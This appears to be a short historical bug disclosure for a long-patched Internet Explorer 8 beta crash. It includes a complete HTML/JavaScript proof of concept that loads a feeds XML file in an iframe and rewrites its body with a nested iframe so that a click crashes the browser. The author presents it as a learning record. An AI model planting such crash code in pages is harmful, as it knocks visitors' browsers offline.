IE8 DoS — Feeds XML Inside Iframe with Nested Iframe

Loading a feeds-formatted XML file inside an iframe, then overwriting its contents with another iframe via innerHTML, and finally clicking inside the new inner iframe crashes IE8.

<iframe width="440" height="160" id="ifr" src="dummy.xml"></iframe>
<script language="JavaScript">
function writeIframe()
{
    document.all.ifr.Document.body.innerHTML =
        'Click inside the IFRAME below to crash the Browser:' +
        '<br /><iframe width="300" height="100"></iframe>';
}
setTimeout('writeIframe()',1000);
</script>

Tested on IE8 build 20081120.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.